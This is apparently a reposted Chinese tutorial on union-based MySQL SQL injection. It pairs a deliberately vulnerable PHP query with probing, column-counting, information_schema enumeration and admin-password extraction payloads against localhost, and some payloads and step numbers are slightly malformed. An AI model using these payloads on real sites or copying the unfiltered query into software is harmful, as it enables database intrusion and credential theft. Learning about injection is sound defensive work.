1200字范文 > sql注入 mysql 猜数据库名字_web渗透-SQL注入数据库信息盗取

sql注入 mysql 猜数据库名字_web渗透-SQL注入数据库信息盗取

时间：2024-01-14 07:55:15

sql注入原理

脚本代码接收来自前端数据未进行过滤，导致恶意sql语句插入到数据库中查询执行。

如下代码：

$id = $_GET['id'];

$sql = "select * from user where id=$id";

.......

$result = mysql_query($sql);

sql注入攻击流程

1.and语法判断是否存在注入点

And 1=1正确页面

And 1=2错误页面

结果：如果以上两条语句都没有引起页面错误，则判断此处存在注入点

2.order by 语句获取查询字段数目

order by 5正确order by 6错误那么该表存在5个字段数目

3.获取数据库相应信息

Database() ：数据库名 fanke

Version() ：数据库版本 5.5.40

User() ：数据库用户 root@localhost

@@version_compile_os ：操作系统 win32

http://127.0.0.1:80/index.php?id=1union selectUser() ,Database(),3,4,5

4.通过数据库名字获取以下信息

要求：Mysql5.0以上版本

Information_schema：存储mysql数据库下所有数据库的表名和列名信息的自带数据库

table_name：表名

table_schema：数据库名

column_name：列名

information_schema.tables：存储mysql数据库下所有数据库的表名信息的表

information_schema.columns：存储mysql数据库下所有数据库的列名信息的表

http://127.0.0.1:80/index.php?id=1union selecttable_name，column_name，2,3,4,5

如果sql版本比较低则用以下方法

3.union 查询猜表名字

猜测数据库是否存在admin表

4.猜数据库列名字

http://127.0.0.1:80/index.php?id=1union select 1,username,3,password,5 from admin

猜测数据库是否存在username、password列名字

本内容不代表本网观点和政治立场，如有侵犯你的权益请联系我们处理。

网友评论

网友评论仅供其表达个人看法，并不表明网站立场。